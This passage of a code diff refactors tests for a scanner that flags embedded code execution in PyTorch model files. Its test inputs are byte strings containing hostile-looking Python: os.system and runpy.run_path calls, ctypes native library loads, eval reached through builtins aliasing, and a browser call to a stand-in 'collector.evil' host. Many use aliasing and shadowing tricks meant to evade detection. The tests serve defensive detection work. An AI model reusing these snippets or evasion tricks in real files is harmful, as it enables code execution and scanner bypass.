"Dynamic module execution detected") def test_scan_model_ignores_shadowed_late_assignment_alias_call_after_priority_window(self) -> None: detector = JITScriptDetector() @@ -1431,11 +1387,7 @@ def test_scan_model_ignores_dead_branch_priority_import_after_default_cap(self) + b"rp.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_priority_import_offsets_ignore_non_executable_import_text(self) -> None: source = ( @@ -1469,24 +1421,14 @@ def test_scan_model_ignores_non_ascii_string_priority_decoys(self) -> None: ) source = b"\x00\xff" + import_decoys + b"import os as alias\nalias.system('payload')\n" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "OS command execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "OS command execution detected") def test_scan_model_ignores_priority_import_decoys_before_late_dangerous_import(self) -> None: detector = JITScriptDetector() import_decoys = b"# import os\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPETS + 2) source = b"\x00\xff" + import_decoys + b"import os as alias\nalias.system('payload')\n" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "OS command execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "OS command execution detected") def test_scan_model_keeps_late_semicolon_priority_import(self) -> None: detector = JITScriptDetector() @@ -1572,12 +1514,7 @@ def test_scan_model_probes_import_after_detached_continuation_header(self) -> No b"else: from webbrowser import open as opener; opener('https://example.invalid')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_pattern(JITScriptDetector(), source, "payload.bin", "Web browser launch detected") def test_scan_model_probes_import_after_duplicate_else_header(self) -> None: source = ( @@ -1588,12 +1525,7 @@ def test_scan_model_probes_import_after_duplicate_else_header(self) -> None: b"else: from webbrowser import open as opener; opener('https://example.invalid')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_pattern(JITScriptDetector(), source, "payload.bin", "Web browser launch detected") @pytest.mark.parametrize(("condition", "should_detect"), [(b"True", False), (b"False", True)]) def test_scan_model_preserves_context_for_same_line_continuation_import( @@ -2038,11 +1970,7 @@ def test_scan_model_detects_same_line_alias_capture_before_shadow(self) -> None: + b"b('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_ignores_unrelated_assignment_alias_before_delayed_priority_call(self) -> None: detector = JITScriptDetector() @@ -2087,11 +2015,7 @@ def test_scan_model_detects_late_function_local_assignment_alias_after_priority_ b" run = runpy.run_path\n" + padding + b" return run('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") @pytest.mark.parametrize( "call_line", @@ -2409,11 +2333,7 @@ def test_scan_model_detects_late_conditional_expression_alias_call(self) -> None b"\x00\xffimport runpy as rp\n" + padding + b"(rp.run_path if True else print)('payload.py')\n" + padding ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_ignores_late_statically_safe_conditional_expression_alias_call(self) -> None: detector = JITScriptDetector() @@ -2431,11 +2351,7 @@ def test_scan_model_detects_late_member_load_invoked_by_local_target(self) -> No padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) source = b"\x00\xffimport runpy as rp\n" + padding + b"for f in [rp.run_path]: f('payload.py')\n" + padding - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_late_compound_alias_call(self) -> None: detector = JITScriptDetector() @@ -2447,33 +2363,21 @@ def test_scan_model_detects_late_compound_alias_call(self) -> None: + padding ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_late_same_line_assignment_alias_call(self) -> None: detector = JITScriptDetector() padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) source = b"\x00\xffimport runpy as rp\n" + padding + b"x = 0; rp.run_path('payload.py')\n" + padding - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_late_vars_alias_lookup_call(self) -> None: detector = JITScriptDetector() padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) source = b"\x00\xffimport ctypes as c\n" + padding + b"vars(c)['CDLL']('payload')\n" + padding - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Native library loading detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Native library loading detected") def test_scan_model_ignores_long_chain_after_safe_module_rebind(self) -> None: detector = JITScriptDetector() @@ -2741,25 +2645,7 @@ def test_scan_model_detects_late_parenthesized_alias_restored_after_visible_safe def test_scan_model_resolves_late_parenthesized_alias_dependencies_at_rebind_time( self, late_state: bytes, expect_finding: bool ) -> None: - detector = JITScriptDetector() - leading_blocks = b"".join( - f"def benign_{index}():\n return {index}\n}}\x00".encode() - for index in range(jit_script_module._MAX_DEFAULT_EMBEDDED_PYTHON_SNIPPETS + 2) - ) - padding_line = b"# pad\n" - padding = padding_line * ( - jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(padding_line) + 8 - ) - source = ( - b"\x00\xff" + leading_blocks + b"from runpy import run_path as runner\n" + padding + late_state + padding - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - has_dynamic_finding = any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) - - assert has_dynamic_finding is expect_finding + _assert_late_alias_rebind_detection(late_state, expect_finding) def test_scan_model_ignores_passive_alias_members_before_late_parenthesized_call(self) -> None: detector = JITScriptDetector() @@ -2829,25 +2715,7 @@ def test_scan_model_preserves_safe_member_overwrite_after_passive_alias_members( def test_scan_model_handles_constant_guarded_late_alias_rebindings( self, late_state: bytes, expect_finding: bool ) -> None: - detector = JITScriptDetector() - leading_blocks = b"".join( - f"def benign_{index}():\n return {index}\n}}\x00".encode() - for index in range(jit_script_module._MAX_DEFAULT_EMBEDDED_PYTHON_SNIPPETS + 2) - ) - padding_line = b"# pad\n" - padding = padding_line * ( - jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(padding_line) + 8 - ) - source = ( - b"\x00\xff" + leading_blocks + b"from runpy import run_path as runner\n" + padding + late_state + padding - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - has_dynamic_finding = any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) - - assert has_dynamic_finding is expect_finding + _assert_late_alias_rebind_detection(late_state, expect_finding) @pytest.mark.parametrize( ("guard", "expect_finding"), @@ -2989,15 +2857,7 @@ def test_scan_model_preserves_definitely_safe_late_conditional_alias_state(self, ], ) def test_scan_model_detects_late_alias_after_uncertain_safe_overwrite(self, late_state: bytes) -> None: - detector = JITScriptDetector() - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - source = b"\x00\xffimport runpy as rp\n" + padding + late_state + padding - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_late_runpy_alias_detected(late_state) @pytest.mark.parametrize( "late_state", @@ -3022,15 +2882,7 @@ def test_scan_model_detects_late_alias_after_uncertain_safe_overwrite(self, late ], ) def test_scan_model_detects_late_alias_after_non_executed_safe_shadow(self, late_state: bytes) -> None: - detector = JITScriptDetector() - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - source = b"\x00\xffimport runpy as rp\n" + padding + late_state + padding - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_late_runpy_alias_detected(late_state) def test_scan_model_detects_retained_alias_after_raising_late_with_shadow(self) -> None: detector = JITScriptDetector() @@ -3054,12 +2906,7 @@ def test_scan_model_detects_forwarded_late_ctypes_attribute_load(self) -> None: padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) source = b"\x00\xffimport ctypes as c\n" + padding + b"loader = c.cdll\nloader.msvcrt\n" + padding - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Native library loading detected") @pytest.mark.parametrize( ("prefix", "late_state", "expected_pattern"), @@ -3105,15 +2952,7 @@ def test_scan_model_detects_forwarded_late_ctypes_attribute_load(self) -> None: def test_scan_model_detects_boolean_fallback_after_static_builtin_mapping_mutation( self, prefix: bytes, late_state: bytes, expected_pattern: str ) -> None: - detector = JITScriptDetector() - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - source = b"\x00\xff" + prefix + padding + late_state + padding - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) + _assert_late_typed_member_detected(prefix, late_state, expected_pattern) @pytest.mark.parametrize( ("prefix", "late_state", "unexpected_pattern"), @@ -4912,15 +4751,7 @@ def test_scan_model_preserves_safe_late_typed_member_overwrite( def test_scan_model_preserves_dangerous_typed_member_captured_before_safe_overwrite( self, prefix: bytes, late_state: bytes, expected_pattern: str ) -> None: - detector = JITScriptDetector() - padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) - source = b"\x00\xff" + prefix + padding + late_state + padding - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) + _assert_late_typed_member_detected(prefix, late_state, expected_pattern) def test_scan_model_detects_native_load_in_rebound_typed_member_self_write(self) -> None: detector = JITScriptDetector() @@ -4932,12 +4763,7 @@ def test_scan_model_detects_native_load_in_rebound_typed_member_self_write(self) + padding ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Native library loading detected") def test_scan_model_detects_typed_member_restore_after_state_overflow(self) -> None: detector = JITScriptDetector() @@ -6510,11 +6336,7 @@ def test_scan_model_detects_late_wildcard_import_call_after_priority_window(self ) source = b"\x00\xff" + leading_blocks + b"from runpy import *\n" + padding + b"run_path('payload.py')\n" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_preserves_raw_runpy_hit_in_compacted_priority_gap(self) -> None: detector = JITScriptDetector() @@ -6553,11 +6375,7 @@ def test_scan_model_detects_later_priority_alias_pair_inside_same_block(self) -> + b" return rp.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_embedded_python_prefix_context_tail_starts_are_bounded(self) -> None: prefix = b"\x00\xffimport runpy as rp\n" + b"# prefix\n" * 1024 @@ -6667,12 +6485,7 @@ def test_scan_model_detects_alias_to_builtins_module(self) -> None: ], ) def test_scan_model_detects_dangerous_dunder_builtins_access(self, body: str) -> None: - detector = JITScriptDetector() - data = f"\x00\xffdef payload(value):\n {body}\n".encode() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + _assert_eval_body_detected(body) @pytest.mark.parametrize( "body", @@ -6740,11 +6553,7 @@ def test_scan_model_detects_dangerous_builtins_through_indirect_storage(self, bo ], ) def test_scan_model_detects_dangerous_builtins_across_extended_alias_transfers(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + _assert_eval_builtin_detected(data) @pytest.mark.parametrize( "data", @@ -6792,12 +6601,7 @@ def test_scan_model_detects_dangerous_builtins_across_extended_alias_transfers(s ], ) def test_scan_model_avoids_false_positives_across_extended_alias_transfers(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert not any(finding.type == "dangerous_builtin" for finding in findings) - assert not any(finding.severity == "CRITICAL" for finding in findings) + _assert_no_critical_builtin_findings(data) @pytest.mark.parametrize( "data", @@ -6999,11 +6803,7 @@ def test_scan_model_avoids_false_positives_across_extended_alias_transfers(self, ], ) def test_scan_model_detects_dangerous_builtins_across_callable_summaries(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + _assert_eval_builtin_detected(data) @pytest.mark.parametrize( "source", @@ -7484,12 +7284,7 @@ def test_dangerous_builtin_alias_regressions_avoid_false_positives(self, source: ], ) def test_scan_model_avoids_false_positives_across_callable_summaries(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert not any(finding.type == "dangerous_builtin" for finding in findings) - assert not any(finding.severity == "CRITICAL" for finding in findings) + _assert_no_critical_builtin_findings(data) @pytest.mark.parametrize( ("data", "expected"), @@ -7588,12 +7383,7 @@ def test_scan_model_keeps_unrelated_native_load_after_safe_runpy_overwrite(self) detector = JITScriptDetector() data = b"\x00\xffimport runpy\nrunpy.run_path = print\nimport ctypes\nctypes.CDLL('libpayload.so')\n" - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.bin", "Native library loading detected") def test_scan_model_keeps_other_runpy_member_after_safe_deferred_overwrite(self) -> None: """Call-specific runpy suppression must not erase a different dangerous member.""" @@ -7606,12 +7396,7 @@ def test_scan_model_keeps_other_runpy_member_after_safe_deferred_overwrite(self) b"alias.run_module('payload')\n" ) - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_does_not_decode_unbounded_binary_for_suppression( self, @@ -7678,12 +7463,7 @@ def test_scan_model_keeps_late_dangerous_call_after_safe_middle_call(self) -> No def test_scan_model_keeps_dangerous_typed_call_when_safe_overwrite_is_unproven(self, data: bytes) -> None: detector = JITScriptDetector() - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.py", "Web browser launch detected") @pytest.mark.parametrize( ("data", "expected_pattern"), @@ -7721,137 +7501,348 @@ def test_scan_model_keeps_call_when_safe_overwrite_proof_is_untrusted( finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings ) - def test_scan_model_keeps_original_alias_after_uncertain_try_rebind(self) -> None: - source = ( - b"import webbrowser as wb\nactual = wb\ntry:\n wb = object()\n" - b"except Exception:\n pass\nwb.open = print\nactual.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_allows_safe_overwrite_after_non_raising_try(self) -> None: - source = b"import webbrowser as wb\ntry:\n wb.open = print\nexcept Exception:\n pass\nwb.open('safe')\n" - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_keeps_original_alias_after_uncertain_try_star_rebind(self) -> None: - if not hasattr(ast, "TryStar"): - pytest.skip("except* requires Python 3.11+") - source = ( - b"import webbrowser as wb\nactual = wb\ntry:\n wb = object()\n" - b"except* Exception:\n pass\nwb.open = print\nactual.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( - "dict_shadow", - [ - b"builtins.__dict__.update(dict=Safe)\n", - b"setattr(builtins, 'dict', Safe)\n", - ], - ) - def test_scan_model_rejects_dict_update_after_builtin_dict_shadow(self, dict_shadow: bytes) -> None: - source = ( - b"import builtins, webbrowser as wb\n" - b"class Safe:\n @staticmethod\n def update(*args, **kwargs):\n pass\n" - + dict_shadow - + b"dict.update(wb.__dict__, open=print)\nwb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_rejects_dict_update_after_walrus_builtin_dict_shadow(self) -> None: - source = ( - b"import builtins, webbrowser as wb\n" - b"class Safe:\n @staticmethod\n def update(*args, **kwargs):\n pass\n" - b"(mapping := builtins.__dict__).update(dict=Safe)\n" - b"dict.update(wb.__dict__, open=print)\nwb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_allows_safe_update_through_walrus_mapping_receiver(self) -> None: - source = b"import webbrowser as wb\n(mapping := wb.__dict__).update(open=print)\nwb.open('safe')\n" - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - @pytest.mark.parametrize( - "shadow_statement", - [ - b"(vars := lambda _value: {})\nvars(wb).update(open=print)\n", - b"((setattr := lambda *args: None), setattr(wb, 'open', print))\n", - ], - ) - def test_scan_model_rejects_safe_overwrite_through_walrus_shadowed_helper( - self, - shadow_statement: bytes, - ) -> None: - source = b"import webbrowser as wb\n" + shadow_statement + b"wb.open('https://example.invalid')\n" - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - @pytest.mark.parametrize( - "alias_statement", + ("source", "expected_pattern"), [ - b"update: object = dict.update\nupdate(wb.__dict__, open=print)\n", - b"mapping_type: object = dict\nmapping_type.update(wb.__dict__, open=print)\n", + pytest.param( + b"import webbrowser as wb\nactual = wb\ntry:\n wb = object()\n" + b"except Exception:\n pass\nwb.open = print\nactual.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_keeps_original_alias_after_uncertain_try_rebind", + ), + pytest.param( + b"import builtins, webbrowser as wb\n" + b"class Safe:\n @staticmethod\n def update(*args, **kwargs):\n pass\n" + b"(mapping := builtins.__dict__).update(dict=Safe)\n" + b"dict.update(wb.__dict__, open=print)\nwb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_rejects_dict_update_after_walrus_builtin_dict_shadow", + ), + pytest.param( + b"import webbrowser as wb\nclass Safe:\n" + b" @staticmethod\n def update(*args, **kwargs):\n pass\n" + b"dict = Safe\nupdate: object = dict.update\n" + b"update(wb.__dict__, open=print)\nwb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_rejects_annotated_dict_update_alias_after_shadow", + ), + pytest.param( + b"import sys, webbrowser as wb\nwb.open = print\n" + b"sys.modules.__setitem__('webbrowser', object())\n" + b"import webbrowser as wb2\nwb2.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_invalidates_safe_overwrite_across_sys_modules_setitem", + ), + pytest.param( + b"import runpy as rp\nprint = eval\nrp.run_path = print\nrp.run_path('payload.py')\n", + "Dynamic module execution detected", + id="test_scan_model_rejects_runpy_overwrite_after_print_shadow", + ), + pytest.param( + b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" + b"if flag:\n wb.open = original\n" + b"((wb).open)('https://collector.evil')\n", + "Web browser launch detected", + id="test_scan_model_invalidates_safe_member_in_uncertain_branch", + ), + pytest.param( + b"from webbrowser import open as opener\n" + b"import webbrowser as wb\n" + b"wb.open = print\n" + b"opener('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_keeps_typed_call_imported_before_safe_overwrite", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\n" + b"class Holder:\n print = input\n" + b"builtins = Holder\nwb.open = builtins.print\n" + b"wb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_rejects_print_attribute_on_rebound_builtins_name", + ), + pytest.param( + b"import builtins as bi\nimport ctypes as c\n" + b"class Lazy:\n @staticmethod\n def list(values):\n return values\n" + b"((bi := Lazy), bi.list(c.__dict__.update(CDLL=print) for _ in [0]))\n" + b"loader = c.CDLL\nloader('libpayload.so')\n", + "Native library loading detected", + id="test_scan_model_rejects_lazy_consumer_after_same_expression_builtins_rebind", + ), + pytest.param( + b"import builtins as bi\nimport ctypes as c\nloader = c.CDLL\n" + b"bi.list((loader := print) for _ in [0] for __ in [])\n" + b"loader('libpayload.so')\n", + "Native library loading detected", + id="test_scan_model_keeps_alias_when_eager_generator_inner_iterable_is_empty", + ), + pytest.param( + b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" + b"from webbrowser import open as opener\n" + b"if condition:\n wb.open = original\n from webbrowser import open as opener\n" + b"opener('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_keeps_dangerous_import_after_uncertain_member_restore", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\noriginal = wb.open\n" + b"if condition:\n setattr(builtins, 'print', original)\n" + b"wb.open = builtins.print\nwb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_rejects_uncertain_builtin_print_helper_mutation", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\noriginal = wb.open\n" + b"builtins.print = builtins = original\n" + b"wb.open = print\nwb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_tracks_builtin_mutation_before_chained_rebind", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\n" + b"original = wb.open\nbuiltins.print = original\n" + b"mutated_print = builtins.print\n" + b"builtins.print = mutated_print\n" + b"wb.open = builtins.print\nwb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_rejects_restored_mutated_builtin_print_alias", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\n" + b"original = wb.open\nmember = 'print'\n" + b"builtins.__dict__[member] = original\n" + b"wb.open = builtins.print\nwb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_rejects_dynamic_builtin_print_mapping_mutation", + ), + pytest.param( + b"import webbrowser as wb\n" + b"original = wb.open\n" + b"wb.open = print\n" + b"from webbrowser import open as opener\n" + b"if condition:\n opener = original\n" + b"opener('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_keeps_maybe_dangerous_imported_callable_rebinding", + ), + pytest.param( + b"from webbrowser import open as opener\n" + b"import webbrowser as wb\n" + b"wb.open = print\n" + b"if condition:\n from webbrowser import open as opener\n" + b"opener('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_keeps_dangerous_callable_across_uncertain_reimport", + ), + pytest.param( + b"import webbrowser as wb\nwb.open = print\n" + b"if condition:\n print = input\n wb.open = print\n" + b"wb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_rejects_uncertain_member_write_after_branch_print_shadow", + ), + pytest.param( + b"import webbrowser as wb\n" + b"[wb.__dict__.update(open=print) for _ in values]\n" + b"wb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_treats_comprehension_typed_write_as_conditional", + ), + pytest.param( + b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" + b"getattr(wb, '__dict__')['open'] = original\nwb.open('https://example.invalid')\n", + "Web browser launch detected", + id="test_scan_model_tracks_getattr_typed_mapping_restore", + ), ], ) - def test_scan_model_allows_safe_overwrite_through_annotated_dict_helper_alias( - self, - alias_statement: bytes, - ) -> None: - source = b"import webbrowser as wb\n" + alias_statement + b"wb.open('safe')\n" + def test_scan_model_retains_unproven_typed_member_overwrites(self, source: bytes, expected_pattern: str) -> None: + _assert_typed_member_detected(source, expected_pattern) + @pytest.mark.parametrize( + ("source", "expected_pattern"), + [ + pytest.param( + b"import webbrowser as wb\ntry:\n wb.open = print\nexcept Exception:\n pass\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_allows_safe_overwrite_after_non_raising_try", + ), + pytest.param( + b"import webbrowser as wb\n(mapping := wb.__dict__).update(open=print)\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_allows_safe_update_through_walrus_mapping_receiver", + ), + pytest.param( + b"import sys, webbrowser as wb\nwb.open = print\n" + b"sys.modules.setdefault('webbrowser', object())\n" + b"import webbrowser as wb2\nwb2.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_preserves_safe_overwrite_across_sys_modules_setdefault", + ), + pytest.param( + b"import webbrowser as wb\nclass C:\n wb = object()\n wb.open = print\n wb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_ignores_safe_class_local_module_alias_call", + ), + pytest.param( + b"import webbrowser as wb\nclass Base:\n pass\nclass Trap(Base):\n pass\n" + b"holder = Base()\nholder.__class__ = Trap\nwb.open = print\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_ignores_unrelated_object_class_mutation_before_safe_overwrite", + ), + pytest.param( + b"import webbrowser as old, types, sys\nclass Trap(types.ModuleType):\n pass\n" + b"old.__class__ = Trap\ndel sys.modules['webbrowser']\nimport webbrowser as fresh\n" + b"fresh.open = print\nfresh.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_allows_safe_overwrite_on_fresh_module_generation_after_class_mutation", + ), + pytest.param( + b"import runpy as rp\nrp.run_path = print\nprint = eval\nrp.run_path('safe')\n", + "Dynamic module execution detected", + id="test_scan_model_preserves_safe_runpy_overwrite_before_print_shadow", + ), + pytest.param( + b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" + b"other = {}\nother['open'] = original\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_ignores_unrelated_mapping_assignment_after_typed_safe_overwrite", + ), + pytest.param( + b"import webbrowser as wb\nwb.open = print\nfrom webbrowser import open as opener\nopener('safe')\n", + "Web browser launch detected", + id="test_scan_model_suppresses_typed_call_imported_after_safe_overwrite", + ), + pytest.param( + b"import webbrowser as wb\n" + b"list(x for _ in [0] for __ in (setattr(wb, 'open', print),))\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_suppresses_safe_eager_nested_generator_iterable_mutation", + ), + pytest.param( + b"import ctypes as c\nunused = ((print := eval) for _ in [])\nc.CDLL = print\nc.CDLL('safe')\n", + "Native library loading detected", + id="test_scan_model_accepts_builtin_print_after_statically_empty_generator_walrus", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\n" + b"builtins.print = builtins.print\n" + b"wb.open = builtins.print\n" + b"wb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_accepts_self_assignment_of_builtin_print", + ), + pytest.param( + b"import webbrowser as wb\nwb.open = print\n" + b"if condition:\n wb = Holder\nelse:\n wb.open = print\n" + b"wb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_accepts_safe_else_after_uncertain_typed_alias_rebind", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\noriginal = wb.open\n" + b"try:\n setattr(builtins.__dict__, 'print', original)\n" + b"except AttributeError:\n pass\nwb.open = builtins.print\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_ignores_failed_dangerous_setattr_on_builtin_mapping", + ), + pytest.param( + b"import 